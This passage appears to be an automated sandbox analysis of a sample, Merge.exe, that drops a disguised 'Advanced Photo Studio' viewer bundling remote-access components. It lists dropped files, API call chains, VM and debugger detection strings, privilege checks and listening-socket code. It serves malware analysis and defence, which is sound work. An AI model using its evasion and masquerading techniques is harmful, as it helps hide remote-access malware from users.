                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\RwcTouch.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FilesystemDialogs.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1111FF80 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_1111FF80
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11130AA0 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,6_2_11130AA0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110BB710 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110BB710
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1110B640 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_1110B640
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110C5D30 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110C5D30
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110C5D30 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110C5D30
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10701940 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_10701940
                                Source: C:\Users\user\Desktop\Merge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeWindow / User API: threadDelayed 9115Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_6-51743
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-51257
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeAPI coverage: 6.6 %
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11103360 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11103360
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110619A0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110619A0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102BC80
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: Merge.exe, 00000000.00000002.2551385573.0000000000AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2587207924.0000000007A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2554251525.00000000007B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3095745834.0000000000728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claJf
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VMNC;Vmware;;;http://www.vmware.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VMNC;Vmware;4CC;V;;;;http://www.vmware.com/
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeAPI call chain: ExitProcess graph end nodegraph_6-49130
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeAPI call chain: ExitProcess graph end nodegraph_6-50074
                                Source: C:\Users\user\Desktop\Merge.exeCode function: 0_2_016C1FE7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_016C1FE7
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1000DA20 _FreeImage_RegisterExternalPlugin@20,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,6_2_1000DA20
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11171684 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_11171684
                                Source: C:\Users\user\Desktop\Merge.exeCode function: 0_2_016AE75F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_016AE75F
                                Source: C:\Users\user\Desktop\Merge.exeCode function: 0_2_016C1FE7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_016C1FE7
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10275440 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10275440
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1027C54E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1027C54E
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11163549 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_11163549
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11157561 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11157561
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1102F670 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_1102F670
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110ED440 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110ED440
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11117F00 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,6_2_11117F00
                                Source: C:\Users\user\Desktop\Merge.exeProcess created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11098E70 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_11098E70
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110995F0 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_110995F0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A5B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerass
                                Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A5B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager*dow^
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman|
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTraceRunpluginTimeout
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: EnumSystemLocalesA,6_2_1070B4E7
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: EnumSystemLocalesA,6_2_1070B4E8
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: EnumSystemLocalesA,6_2_1070B14A
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,6_2_1070E5F1
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoA,6_2_1070B6DC
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoA,MultiByteToWideChar,6_2_1070E6AE
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,6_2_1070AF75
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,6_2_1070E704
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: EnumSystemLocalesA,6_2_1070B3D5
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: GetLocaleInfoW,WideCharToMultiByte,6_2_1070E7C7
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_111691F3
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11169022
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_1116931A
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11169356
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_111692B3
                                Source: C:\Users\user\Desktop\Merge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\__db.s5sg.4 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\__db.s5sg.4 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5sg.4 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TMP3B6C.tmp VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeCode function: 0_2_016AEDCC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_016AEDCC
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110391A0 _calloc,GetUserNameA,_free,_calloc,_free,6_2_110391A0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1070E05D InterlockedDecrement,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_1070E05D
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10007420 _FreeImage_GetVersion@0,6_2_10007420
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10703240 CapiListen,6_2_10703240
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110D1640 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_110D1640
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1106B9D0 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_1106B9D0
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.7e20000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.a703500.66.raw.unpack, type: UNPACKEDPE
